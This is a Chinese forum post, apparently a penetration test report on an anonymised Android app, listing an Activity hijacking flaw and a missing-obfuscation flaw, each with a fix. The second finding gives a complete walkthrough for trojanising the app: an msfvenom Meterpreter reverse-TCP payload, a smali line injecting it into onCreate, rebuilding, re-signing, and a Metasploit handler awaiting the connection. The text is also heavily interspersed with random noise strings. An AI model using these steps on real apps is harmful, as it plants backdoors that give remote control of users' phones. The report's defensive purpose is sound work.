8 V3 S( e, r8 a7 k# Q+ D 4 E3 H. p$ }& s+ W 1-2 测试结果 # a# \4 E2 X# x2 M* f & Y% t; `7 x7 Z! L/ a

3 _, B; o/ v/ W& t3 J4 [2 M7 o& c & l- D- l, q3 I( x$ ^

`$ o5 U9 G0 q, ?) ` 7 ?% h; | g7 M   ' J7 {8 V3 i2 f% z1 L( Z# m( V& N1 B

: y5 x8 O. k4 B6 U0 n# s9 W0 X4 @! O+ E5 U* D* X" x' Q& q

6 E0 x( u: n' o* P/ @0 }- o2 b2 w2 p3 H( S4 \' v. Y 2 检测结果                    % x4 U0 r. b3 I % G7 H" u/ @$ N4 S1 R3 Z

$ v0 A1 c; F J W- Q( J1 F+ u0 H# h* c+ K( _" G! F; G$ K

3 ~. k# A$ j/ L# Z( K& [4 _3 k& \9 z# \ : ?2 e' | x0 l7 B r- i! y; ] 2.1 某某某 5 i& ^% K# { |: Q0 g* t W* c# l7 L7 c8 ?8 s& P

2 L. ~# m0 M' Z1 O7 `) y2 g % n% _3 t: n9 ]* y. {

; j( i2 l1 r4 i+ K O * o% @- t0 x5 e8 d( Y5 a; H& [* B, r 2.1.1检测目标 * a2 F; m5 q6 I" G9 G0 |1 U' \- ~# Y4 y: C! y8 e

5 P! |$ J# @7 t3 E8 M( e( R 8 P: x/ }7 a" w Q1 z2 o

! n0 ~9 X* P4 I# E7 S+ {4 Y9 H " T* K( P% E6 G4 t+ _ 目标地址: 某某某某某某APP , c9 l, S0 x6 m+ k6 ^* Q7 M* Y , {* z* f! j2 w2 ^2 N: b

8 i$ z+ i2 N- F ) b' ^5 t3 y8 U# r

/ L- G) M, V% s9 x, }* u a 1 C8 Z6 g& d2 m2 b$ f' ?" ^6 Q 2.1.2检测结果 . Z) z& t$ {* P; x: b5 J ) [( ?$ `* l1 @

( x$ p* ]% z3 p7 ^; \: _ 9 D; c. ~ A% L* p

" z4 y* `5 t" H* D$ x% P1 Q" m$ X5 L$ x) y/ @/ }1 ] 2.1.2.1 4 a. ]: y/ z: z5 Z 6 [) }4 c- D& b' a8 \

: q* B1 T. e ?( p) v1 i ; f9 n2 R! ]/ U! M4 j' P: [

/ I! i2 \ C s7 b+ ?' Y0 a& q0 n" m+ v# A% A/ M" e# Y 漏洞链接地址:某某某某某某APP ]8 C! Z* t9 T1 d7 m# `5 A G( `; g" r 2 c& A6 W: F i2 L, f

$ f: x5 i# g/ @ ' n6 S$ x! f7 d: w: Z

9 g' F4 g! r" L1 t6 D0 |7 ^2 ~. e ' c0 T" l0 z+ q: h- v   @/ f# ]! O/ l% L1 { ; `) l6 G: j# I* E

# }$ _% S; S7 x3 @2 {$ c' {0 e & e% F. x0 _% w+ b* x4 C

# i" I% e$ o% n ; q; B8 m4 k, f+ k# I 漏洞分析及取证: 2 k h7 v; [/ N 9 \4 `% Y$ A6 B) S1 t

' |% r$ E. k- Y* Z! j6 c6 `% ?* @$ k% x% N% h* R

( X0 v* p6 T1 ]2 k: [" t. f0 m                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: % q7 {+ b [5 R& k 8 K# j0 C% ?3 n% B; _

: c% k, c% e- C; n% H' Q/ p+ s6 a# _# w' I0 p. {5 Y( ~

/ e7 F/ d0 E1 g' D* G% b+ u) `( o$ f4 H8 y6 }$ D! Y, ?- `      # G; L. D8 U- x 6 @( R7 f6 v n; e X

9 e! g* y- j g' V8 B4 k5 ]- ~9 F8 y & x7 w) |. P' a: R% ~) [* j

' W% ~$ K4 E4 g* f" _6 j$ ?2 f; E7 w, H# F                       * }+ {: ^4 I" ~' d ( }% b$ j( h f

- ~1 }( r$ p/ R" b$ z, Q( ] ) L) v" c0 H/ M* g6 \

) I: s3 ~, g ^, I8 h7 p ; B( U; e v) \ 7 v5 K/ _5 L& @ . u# k4 A6 E J( N* Z

, C$ t' G2 G) x* Q - ^' U8 i- k! \" Z

- r% J1 J4 Q: d ?6 U ) f) t& j. R1 e" q 4 O' F2 V! h7 [ + `4 x% q A( ^( r: A

* [' F; S/ H% V' D' f3 a3 _1 w 1 R* R9 w, [/ {' I) U

8 Y, T4 k; O1 L" Q; r: p8 j, | " @8 W0 L2 l" \0 V/ b) x* p 9 a; Z1 M6 X0 m6 F( w" ?" F# L/ T1 |0 X6 q

. @" }2 z( @# [$ z9 q$ \3 g [% \8 H! w8 U

9 s% I7 F9 `9 D' v- P 3 L; f$ V7 u( I( n 漏洞危害:高 ) s, y5 Z2 f1 S u- V4 O2 P' o. b + a3 A( {7 h% }! p

; r% y! s7 u! L7 H# v! Y2 }+ f" M( P( n: F- v. b. h' N; c
8 S3 I# f# p4 ?% q* e2 d( u . X8 A; }4 y5 H8 A! l * B' V% K. s3 _0 m7 ]( Q J |" |& p" ^1 i" m; w3 ^7 E7 {3 K4 \, I3 ~- }2 Q- `# {6 n5 c4 M$ {: A+ ?. f3 J a/ }9 e; _! F. {: A% v- H! u0 J/ h# V1 ^3 U. [: u+ J! ~- e0 R5 r! w7 Q0 @" T7 S1 q& \# B& t q# \9 D+ _2 Q0 R, g# [5 n# D' P+ \; @4 a* ]" d; n) @$ g7 T* H/ e5 T$ ]( d) W1 ]$ ^) k/ U6 j2 G' b. P% v! ^% n" N {7 ?. g0 U8 b$ S7 @. Z# Z3 n+ c. {! b: `0 r+ d9 `7 _9 V% E, z. ?; c0 a% |! g2 K5 x, c. \( e* Y3 V+ g: K" U# L9 [+ k% R/ A/ h: h. q3 O' E% l, l" C5 @$ a2 {" B% B# |7 o1 N% L; [ y$ z7 J* g' x+ g' W+ O2 g* T" S0 ^, L0 }' p, T4 ?, O' p; `1 m# m2 H! G8 r1 h" z+ Z: v1 a$ J1 Q8 L9 K: P" b
) q% Q7 E( ^& r8 e9 y3 o" I9 s+ s; b% E& a! t& q0 N

7 e. ^% N p) V. P( X 9 L# ?8 ]8 y; F) b- g; O$ A 严重程度 * l3 |: b3 |% }& c1 ` % P8 \. \3 m3 ]6 @: C

2 V7 n5 L8 E+ {: _( `8 ] : X& V* ]0 G/ Y4 M
2 {: j- D# J$ _1 p 9 [. T) `' G+ D: v/ d

% W: O! a' N5 j1 L2 S 2 A% m% n; S3 O) a& B. e - v7 i: _" o/ G9 i 0 f2 a k* ]$ @8 I

9 x3 A- x* ~; T9 _/ U) P$ \ 1 I3 i' b( @9 p' a8 s0 d
1 Z! G) x" Y- n$ U1 L& A1 `$ v' P3 Z

9 q' R- |; N; J1 _7 z, i* s 1 K# a8 }3 \( z( v" o7 ~! a0 K 1 Y* X, Z+ ^2 B" ^; ~4 A, m$ l' z* [! H9 H% {$ x9 n

# N0 H6 k* B3 U+ `% I- p! y* \ - d+ B7 I1 p1 P6 |5 ^9 m
9 x y+ n, Y9 Z% o2 F4 e * X! f8 L0 Z9 N5 z

4 q! B8 n/ Y/ ^* M3 E3 J5 h; v( F8 X! m8 x0 n, J * s. K& k* u, g7 g& B% o / r9 d- v; `6 A ~6 T, X# _+ n6 _: P

) w& X. B# z& l, y/ ^, `& N! [5 B $ x& N; i) W( A V& L/ _
8 J4 E& n/ i7 r2 d5 b5 s& Z2 A" f0 u! t# A D

' a# I; y0 m3 E# r7 G! L 0 R9 e: D8 {! J   3 {) I' U9 d8 j- X' y% o : H% d2 E. q6 b9 n& h

8 d) H8 J; j, w$ C2 Q" u9 r$ X ( z) v' P" E! _. k9 M
- y* a/ U, N; W1 E* ] Q" x# W7 r! |6 K( Z! L: N

$ `! O _" j8 n! o 1 j, `9 n9 m1 ?# Q6 ~. [ % M3 r, I4 x7 }$ s$ [% z' U8 w+ U6 ?- M0 |. ^$ T3 ?$ F

: u6 _7 ]1 w' \! \, \) b ) {( X1 |1 l3 \: }# U
! X# x+ b- B. l* a$ y4 i ; y# u( G7 r. I v" C( b8 N$ l

# g: g ?$ X4 _: i8 m ' y3 m o& ~' x& v# R5 H( l   0 T" e3 j' j) A' r- p* r+ m, g 1 q' b5 ]. l2 A) y0 ?5 U

5 A* V; C# _+ T, a $ d, _1 ]5 v! {
7 U9 Z2 r( u% D* h1 b# E . u& o; H1 g( O, I5 Z+ k
+ I9 ?5 i# ^$ s2 n 1 ?! p' Z+ D5 |) W

" D8 N8 T4 b1 z$ G; @ 4 [ \2 l0 y- A3 q   " C4 h4 [ C& i7 p' s: Q ; Y9 R/ Z. l k. H L

& o& ^! L9 `/ f7 Z5 J& X, W 3 y! N$ @8 X/ k( M4 X7 R

# h- o1 c4 B$ o; p, Q! R7 @ 6 Q9 o: N! r% s' a 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 0 w2 E1 p9 h# |1 K; f* T3 f* z ! a3 J4 {2 R: c9 t$ ?2 S& g7 N

. r% _: e9 \1 T* N$ g$ U & h9 ?! O7 E' T* J$ |

, D2 u X8 D1 q; ] ; [2 }4 ]0 g/ \$ u1 a3 j           - T: N# c/ A" f1 P K1 g0 `7 v/ |& A5 [- F

0 S7 D& x4 H, ?* O7 A/ R : u2 ^) n [) `6 A

9 \# Y' ?8 P1 ^1 L1 Q; b+ `* u# I0 W( i i   * u; q. _$ q9 p6 F0 B 7 `% h& a8 S: N- b5 A/ ]

& [, c: C. G8 e c5 q" U- ~ . N4 G2 a; E1 t/ G. }" H7 p

1 t# U' ?, H: j5 w7 @: m + s; {, F- x* T8 L# L% a2 R 2.1.2.2 / u0 v( ]# y9 C7 O7 g . K6 @7 a% }0 E( d2 T+ p

7 e! I/ A& R( I- u0 x( E# M * N3 [4 g* t @' ?/ _) V

5 L4 s; o3 J7 O/ Z' r! v 7 Y9 y3 g' }- |* q2 Z 漏洞链接地址:某某某某某某APP 2 F" Y6 Q, z& h. a* z( n ; h3 V# @. ?* g; F4 }

! r5 q- B2 X0 ~- A 4 G% L9 g" l' D8 m! a) [4 q

( R5 W8 }( m$ J: |0 j$ S 0 r8 c6 v! F" _# Y 漏洞分析及取证: , f8 t7 z- ?( n5 W) N" }( s ! s/ S# O3 U# L, o) H8 @

V8 N1 Q6 G8 h5 Z" ]. ] 1 `; P' b B! y; y& }0 ^

4 k. D4 U: G. ]" \3 q3 d$ A% f2 N8 i5 e9 w& S7 i; A- M7 x                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 6 a% d1 m# ]& t- _/ h) x, I6 T: L( o; X* U0 s

7 g( F3 y. n6 L+ P d7 e4 I! n ! z9 o; B! Y& h, w# o& W% r6 q6 W& L4 } o

* G" o2 @0 ~2 m$ w9 g7 {# k# Y4 m2 |" P% g' Y9 i Metasploit 生成木马 apk - R9 d, x+ m) q: N$ [2 v- t n/ R8 |, W. `& ] @

* o2 Q6 k5 @ q% I2 C' Q9 O+ I; b' t$ R/ d

" O6 | w5 L2 c: {) i$ n6 g4 x) Z4 j! J* Y. t3 j+ v L: P9 k( r msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 2 F5 _9 H- B) y/ i7 ]4 c % ~& y* T$ N7 e }6 H

. m% h! ?* r& [2 o; h; O ) j2 Y6 b) h; F

( |7 ~. ~* S9 |- ~/ { 1 S* V: s3 \. t4 ]' f 反编译目标apk和木马apk - n2 k( i- A, i' [. d& n7 X4 |, l( E: ~3 D# q7 ]2 M8 a1 M& A

" B S, b) A% f3 F1 ] . L9 ^. R& a" ~, g

4 Y7 [) q! `) \: }8 H . y. x% P5 Z% m4 w0 x O/ | apktool d target.apk
6 @$ f6 n0 h5 X, t0 h $ T. I3 N0 s( {% Q ] apktool d cockhorse.apk
+ o2 J( f/ e. F g% s / c; i9 q: b7 Q% K3 W

$ ]' r8 g' t1 q S2 c( [, a1 ~+ j) J7 n9 {7 Z5 G

6 K4 `' |2 e4 V( a e k ' M! B, |( B$ P/ k" @ 木马 apk 注入目标 apk 7 z0 _) r$ N* F0 d' c! P4 e/ @% j+ L* J( a

8 M' h: R2 B7 i' u) w8 Z + h4 v% s4 _. h6 Q6 v7 j

$ o$ W- `0 s$ e 4 l ^: M( Z( U: o0 M+ ?7 y 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
2 q" E0 g9 Q4 f7 }' ]' u ' M/ N3 b6 g9 q/ s1 g2 f invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
6 q6 q* _4 e) }: W 6 V# |. J* C6 J/ f

. j3 ?/ s+ u- q2 [: x6 ] # c E2 G0 s" L) Y. W

. a# I! }, o4 t+ o6 f$ @' Z! a# J! l" f9 x) U/ H) J2 G 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 4 u8 F0 O% s+ e+ }$ H 4 K* D) ^& H! c8 s& P2 @5 P0 p

/ q# |7 w- h' v' A- R7 q4 X# a0 k; V+ }( X0 [: b. S& O7 T5 Z

r$ D/ Q( E* `, T* L. B 0 W) m8 W2 J, \% N) K) b: ? 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 0 o/ a7 F- e9 j' l! e" M7 S0 W' ~; _. w! T7 Q& H% Y3 f# ~2 \ U

4 d# H1 v" V- m7 h E K3 O: k4 Q6 p4 p4 M, o, A

- e) s @% Y/ l% m , c% x6 K/ a% y. U( N 回编译生成最终 apk % ?, O E6 H: W) w8 p& r& X1 |' ~# |+ a8 ^

' P9 a4 e6 z$ k' N2 U6 d1 d 2 V2 K/ V/ T! g1 [; @% T! c& H

- y) O9 U5 ]9 P" k- i, A+ v! O% o ' \' F9 I* k- u 重新打包 ( f/ R' c/ y- p q) j - {5 T- F/ h, q& x

2 e, I0 O# T! n5 z9 L) V2 J" l! c$ m8 n# d" Q: @3 V

) ?# d" C$ A# ?- Y6 y ; o7 G$ \4 H+ `' K8 t- ?( E) ~ apktool b -o repackage.apk target_app_floder ) h, N; w. g5 k/ W' X. G $ E; y6 F; B0 {+ }% B

/ T: O2 @' V) j/ v2 ~' |4 y; X! r% N

* `) ^9 C4 |/ x) @4 ]$ d9 Z& ?3 y: _0 E 创建签名文件,有的话可忽略此步骤 3 F: M" b( e+ x1 _4 m( x 9 U' _# H& e6 m K- k

$ k% O* J7 k& X/ d # R/ s6 L$ n0 f/ ?$ w+ _' F

7 i5 Q6 C7 F8 B, R: V; ] , M$ ~, J' B4 ]" t% w9 V% g keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                - ]6 p/ e+ }9 A/ V3 s0 J- X' ^5 R) L8 c; O) ^) X8 A; G

# T" a6 u1 Z" d9 v6 V ( c6 \, n4 ` x5 Y- t

6 O2 Q4 }0 i4 {1 w- [: G. h( w4 a ; A" r8 o' }* ~& @ 签名,以下任选其一 7 t/ |( @: r; C" `. M; \( I3 K& s; \% B% P, \" G

& F3 E2 ?9 J' S& u3 r' V 0 _: e; E" o" t# _# z7 `7 q4 I

2 M, p) ~# `0 W/ t2 o, C7 y4 O 2 `. s* C: T6 K1 f1 O- U7 A( R jarsigner 方式 , `9 k/ S: w k+ G! B/ j* E9 ?

) h4 h% O3 d5 T% z8 n( \ ; X& t/ c0 o; {' e9 ^/ p1 H7 H# _

) O6 T1 n9 Q8 n. |; a% a7 y & K: C; R" V) E1 E jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 7 e! x, L9 ^2 l) n 6 S/ s3 l. B. S8 D! H% Q

: K2 R3 R/ @9 b+ j/ z4 f% c# Q2 Z: P5 g% ^2 ?; P/ o% [

- y) F$ C- A- ^% D% K6 e, z # T( s* s" @1 m9 q9 a. S0 @ apksigner 方式 8 h0 k7 F* [! ~7 T7 L" X & D e! j4 b X! _: l

8 x$ _7 p$ Z3 E0 P) C6 b / D* L! m6 j8 b$ P9 R, ?# X7 h/ O

+ y5 l! X4 c y6 } , _3 U! i" h, {% ]: J apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk ' p- D+ o6 e; b7 v$ E, E/ q0 V / x4 T2 z) L' d3 _" U3 F' s3 b

+ D: D6 J! e' R% n% H 1 a. W/ \. z5 q1 w+ [5 A

( c& s& i* T: i5 q2 J) J3 C1 H0 r5 ^ 7 \8 u3 g: e9 h 如需要禁用 v2签名 添加选项--v2-signing-enabled false 1 y( z/ n& J( X* k$ |3 I- q# a1 S/ O

# r; i- a( n! k5 ]* A8 J( v5 |4 X: ? M( ]* ~1 W

" m# m9 M- X( e0 A4 u ( H0 v+ V( T v$ Z 验证,以下任选其一 8 a4 N+ I: A+ D ) z: g' K0 h! n, J7 r) t

* [ c5 G) d+ }3 O & |* t( a0 ]; I( t4 Y

n. T0 |) }1 q! p4 X8 z! N! J3 S" m z9 P. a4 B, p9 S% Q jarsigner方式 8 }/ V8 q3 o0 X( e 0 F# D, y0 }+ Z7 h/ y

5 T! T* F2 o, @+ m* v, e' Q+ O7 E% @, @& |! T' B0 v

( ^, k( Z+ S9 l- ^- Y& q) Y : O* b+ a5 A' }. g: I jarsigner -verify repackaged.apk 6 G$ f H; U( e! E0 u5 K6 I' T; m e( M# L+ X5 N$ s3 F; u% V6 d

4 }3 e9 w5 H) f' E; G1 [7 E) S ' b/ z/ c+ g$ D9 W+ J, T( Y3 ~

$ {( P" n+ L5 v0 G2 _7 h% l, d ! u0 u: [$ a! ^ M: d; l apksigner 方式 * @3 s- Y7 X0 i4 C$ ?4 X - W$ d. L1 U+ _+ Z: \

+ l# Q9 H+ r# i$ W: g/ d0 f) L 7 g. z6 d) \1 B- e

6 e& m! o$ s' @6 N1 @- A0 t: r6 w9 o" @, [ apksigner verify -v --print-certs repackaged.apk ; u& F1 L1 J& v' q! Y+ \ - Y- N) J; F, Q: n0 a

- Z5 w# V- {! P% a, P& J7 u8 k& { ) A8 R* u6 r5 x- W3 ?

2 Q# T3 m# A2 E* X& z7 X9 l8 ]1 Z; e keytool方式 2 h; h; d/ @7 V; f, m& B' Z/ ~/ i6 h

# _$ X6 f; p5 [5 Z0 A 2 f6 s9 G8 G; D/ _* ]

9 d$ [. L. G' L1 @$ e8 k 2 ~. p: r7 Y1 z. I7 G keytool -printcert -jarfile repackaged.apk ! V! B* x" B* i9 S3 A ( p2 B+ c7 q' O+ o5 n% I

4 W6 x6 Y; }" u2 ]: I. Z% E7 d, C * c# [3 f7 G0 i3 m

+ c. }- }( R- W" r % b7 x, w2 _! n) E3 `! Y m 对齐 ) e( x0 g9 t- E8 f& p3 j p; Q " {: B5 V9 }& Y n1 d, w

% T% ~! J* g3 f5 e! y# E: n( V: g4 m6 w9 t+ C6 ]

" j" A6 {$ \- e # w8 L: r( y* [: m% x( ^ 字节对齐优化 & x: ]8 i+ ?" y# `2 E/ C * P4 w+ ^# m. F9 F) E9 h: F" K) D2 n

. V; z6 f2 ~; S; ?, O % C( s$ T/ Z* h t- D4 j

0 v; Y3 @( W) \, f. h ) u0 t. a# b$ G- T3 Q2 ] zipalign -v 4 repackaged.apk final.apk ! q9 }% C7 I5 ^, y8 R0 ^ ; Q# M$ P( o! E" g' y( d

+ J. a4 L B- O5 l& F/ y- R0 }/ Z8 o

; Q3 i5 C; F+ L* a) v8 o2 l' K& Z/ W( U9 Y% N+ u9 q 检查是否对齐 # T: \2 Q, p" e- m J* ~ 3 U p3 |& ?# a* t* o! K) q

2 W8 A m( o" o4 I* L }- ^' a0 [) `# e7 U

" k5 @( J& x9 Q0 d4 E$ ` / Q" C: @, ?/ Q, G zipalign -c -v 4 final.apk ! l% M/ h& u" X 3 {- b1 W: \: U8 `5 y5 k, a

; l7 m+ o& v0 B; O ! W2 I, U7 C$ A

7 M p) ^9 G* \. |- F5 C3 G: ~$ m3 N1 P) p2 q 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 ( k+ L8 X" z3 ^ + y# {: e: A; ]; M

% V- z( X3 t* B$ {( r$ D5 e+ u# z3 ?# [1 L5 S. J

; X% J! o/ _ U9 B ; I: v5 v `) r, U* J: H* o 启动Metasploit控制台,配置参数等待上线 1 _ u _- ^4 R' r0 E. }/ \% q, u! ? b& @$ g

& f9 u3 G- B* ^! b8 l2 t% \ m e; e' ^! X$ I+ E" {& a

. I2 F% ^. h, }7 q% ?2 M+ Z 0 L! b) e* k+ n- R$ J9 N) ~4 s8 Q 在终端依次输入如下命令 # J9 v1 m/ t4 h% A0 i/ ^* d2 Q8 i; f

0 V; O! d2 c" O9 T' B4 n; ?* Z8 Z! n6 t m+ |) I; [

4 Q3 l( m* {, v' a" r" o* E * H. M2 S5 {7 D9 r, ` msfconsole e% M+ L$ Z6 N- R9 h" q3 ~ 3 @8 w. S3 M9 h' e" h: o0 E5 S

; w2 B2 E1 u5 U5 H! t& d# v6 {9 H8 A3 }* z& _

& o- }; |0 z* P2 K* k: q5 ^) Z3 b , A7 A& L1 I' V% }+ | l& R0 h use exploit/multi/handler , ]- R# f' ?- |; ^7 V7 g: c) i - t) K. }3 U* K* t% F# \' |

1 V4 F K8 q2 H; H! L8 K$ ]9 [3 F9 Z8 m : h) x( [4 Q/ a5 H5 l4 [; j

- M7 D# t0 L2 s 9 n1 @1 y" A# W" I set PAYLOAD android/meterpreter/reverse_tcp - |' `. I6 z6 `) V* x+ t6 S& F% _ , @6 F: O, O# T Y' {& b6 S- S r

# E' t1 ^0 J0 h 5 t3 J( I+ T8 G/ W5 `+ U

4 d8 v7 x- M# t1 a' F/ e) x( q , a" r$ ^% H7 H1 R' u! p1 D set LHOST 192.xxx.xx.xx # C3 g, t2 K% Y0 y7 A; | ) T G& E+ ~9 _8 r8 i- I

1 N; I- |! E" g3 {# l* |1 J& U & |; _* k$ i7 d

$ p9 y) Q- z* k/ K2 U* F8 R - G7 `" M: L; ]1 s' i+ w set LPORT 4444 ' ~/ _" J" w. n0 Z% d . j$ `8 ~( r5 G! @0 v

4 b k' Q9 P, F) W 4 O% P* \; T6 b

3 z& u$ F3 |) o t- N& A; l( m. B! ~, N2 m' Q+ u exploit . h% R* O9 R& L, F2 |6 [8 w" L/ E7 D m" m6 B# w4 S0 j! p

2 l7 Q% P W8 U) P" l' D2 [ # b9 p$ e/ v; m9 d

$ k& B- Q9 L. I ! Y% B+ Z( w+ l4 S& Z$ G! O" f 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               ! ]* E: r# |: H2 v# n$ T" A2 h' q& k' w8 N9 n K t

+ ~# V$ O" l6 \5 Z+ n0 Y 7 A1 N: _; F+ G

; m: M' h9 k$ s% ]4 J1 b) t) W% S% n . g9 w% z$ K8 m+ B9 ?3 b9 T/ g) a 漏洞危害:中 0 L a5 C) m0 j8 V6 o1 ^ , T$ `! w+ a2 u: z6 n7 N5 x

6 p6 L3 E6 L$ \& B, w) j + C$ [" t3 Z$ F6 l3 K Q$ o
0 i3 e% }2 F6 Q1 {: M0 \ * m: }6 v" u* D4 B / r6 G1 \5 f4 N4 Z1 m9 {. r7 v2 | " Q* W3 P6 s" z6 Q w# u " z# L% G/ c9 [2 f I5 n4 d/ U) i2 W# N8 s; h' b1 p x, w: B. j( T3 {& a2 h: R2 Y+ S1 e" U/ V" |& N0 L3 _: a- V3 x! u/ o- F! a, R, }& R2 s, B4 w; n) F" J ?5 Z& U+ m" p- t" m6 N9 n5 p1 ]7 o ] U+ b" k; \: R; d/ p1 h: d' g4 k& D- Y: D$ r0 C# T# M# L1 D) ^4 b+ U2 C" v9 ?, A, C( G' w# B; J/ S( Q9 y- ^) z+ j3 P$ p; e8 M: p; r$ h7 B* k1 ]2 C5 W" x {4 u0 q6 x- r( s6 f! k# d# {% p" y) M1 r" l( f" V/ i% j2 P9 _0 W7 ~1 l6 e: t6 X. |) t/ Q1 s# k) b" j0 U) X' Y6 o4 H, u- X% j( p3 M6 }* \: g" [7 s/ z2 x0 g- C" v/ Y% l( R9 \' E7 J3 ?( ]4 R, \. S: j9 k0 M B& O# M3 p( l' `0 n& _, V2 O; H* s. D
! k9 {5 j+ e( }- V6 d1 C1 I/ ?0 c% r

" Z) w ?1 L9 i- L7 }) u: k - R; ], A" C8 I. f& q& E 严重程度 ! [! S V! U7 R- G" T0 F* s- _" N : n+ p3 Y E* v0 J% v3 l7 S1 ^

9 ^+ @: |. L( Y+ T1 t8 l) K% L q4 Q! ^+ K$ b/ F2 n$ [# {
5 _+ G) l" `" b# X; ]& J% R$ R: Q/ F 3 F: n6 z# {9 S, c$ }4 U

' B! z( K$ y# l! N, x5 P9 N . q0 `! ?; U( T A8 g+ P 4 s* V$ ^- H. D7 ?; b! X - s+ ~. l4 ~4 m: x+ f4 K3 O

4 G! e5 I5 q& M" m# s# T8 o" _2 _+ Y8 Y3 a
0 i* h3 L6 C5 z+ x8 V Y/ n7 |- @ ! d, S- W. ^0 e" I

. r1 A" @6 S% l& D# x H2 d6 { $ r% y( f" Z" ?1 L3 Y ( D7 t0 X. n/ R3 ^) f! W C) w + T) j u2 R( r- \/ Q

. ?, J; i- w$ |1 w0 G' X) Z, H8 E
% [% J& ?3 A% Q# ?* R( S2 k, E* E% R/ t. r# d) g3 g% l

- [1 P: D' `- [3 h ( N4 z+ u/ |$ Z5 w0 O , V0 N7 ]9 _" N4 c, G # _/ T5 s) h' [

; |! E# i5 O: [' ` 9 M3 q' B- {- ~
" a" s1 D9 s+ n1 ^ ) c( W J2 D$ [3 n% \( Q) N ( W! w) o ]/ H$ o2 o r0 }! t8 b. w" V. X0 W1 k

1 M) D9 w. [, T & E( V' D3 X" i# W6 ~ H   7 `5 u d% y- c4 \ m 2 ?/ v. x0 k6 o$ Y/ J

: a- |2 \' H$ L& S3 I( ^- ?( B8 U% r5 K w0 t) o& D
' D, x6 V/ d" \, c' {; [5 | + ~8 v- N$ l5 v' O% k1 M

& n" U3 B& I' B& @" G7 s + X( i5 X# Z6 A9 L) d- t 7 r! e3 U8 F8 |+ ?% E/ I5 S 2 j% {: ~, C& z. P: e Z2 N

$ T* l0 R( I% { Q ) M& Z! v' `. W- e% n
' j3 A( i' n& @4 m7 [* d ( q9 W1 S3 V [+ Z* O 6 u# R. T c2 E2 B7 G" o% n: w% [. U5 B6 J

, {6 C! g+ d6 w( u+ J+ ]) C2 w+ `' s) ]6 Y5 y6 e   / ?* G5 q3 X3 @* H; A. P$ ^: k ' n8 [( s& S0 N. `

3 h* h7 R) w3 v6 O* Q N : ~+ B5 K1 n; H: j7 W+ @- x
, ]. G! ^8 n, E. y % B6 G, T2 i" V0 i! V8 V, v
, c. U2 n, P0 q7 b7 V 6 L: q, V5 P) [/ M) e3 O

( K) ~5 C; y) q( R0 ]1 F! U7 T1 f. R! W   ; R' Y+ w5 R4 O$ J4 G* a6 ^ 9 }1 x. v6 R4 D; S, K

/ p p* h5 m9 X! ?' v+ n% i" I & x% J1 a1 r I: x0 `' [1 ]* r( e

* D! j3 O; a- g7 ^, x2 c& q4 B- a, ` w* N8 C, a 修复方法: 3 F- ^) }2 u) y5 i% m , O# h, m0 Y+ W# ]+ ^* i

, g' ^2 n5 A% C" S5 B `8 G) M3 P$ e+ P2 L$ c2 q3 [

1 I+ o: g! y7 q" Y9 {: K) u ~ u, Y, t: c5 Y8 B# s               1. APP 启动时应做签名校验防止二次打包。
. G5 \; ?) y3 e! C- \- S7 @4 x( N3 k: g 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 * K# v$ e& z6 |& n4 F# v; j+ a 4 S x9 L. D5 C3 Y* e7 Q- N

6 ]3 S* {9 B# _# T - u) T3 \5 z) v `3 \8 J5 t$ [ @ ) W$ m# U" h4 O4 V5 G# t 7 T" o2 _1 t4 Q2 _. m

$ z4 r7 `6 a x5 v5 S: O' P 8 ?8 g1 a5 a9 o1 {   - e+ r& t/ o$ K& G6 j8 I+ |1 N/ C% g: L1 b

$ X i" h: ~1 R. A; b # y+ d2 O: Q, i- k9 ^: ` V; v * W! c) H0 j; t! _9 S ' M- K0 B/ F1 W5 b' Y/ R$ Y: Z

! L" R8 W3 N1 w, M, U# C4 G8 h7 q4 H# Y
+ Q8 Z$ ~" }: _3 X. w4 X* D- r# y 7 z& Y7 @1 L: v9 c* Z

6 x: X# T9 z6 B4 [- K/ {3 F: u" \ 2 d, S8 B9 d7 G/ `( S
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表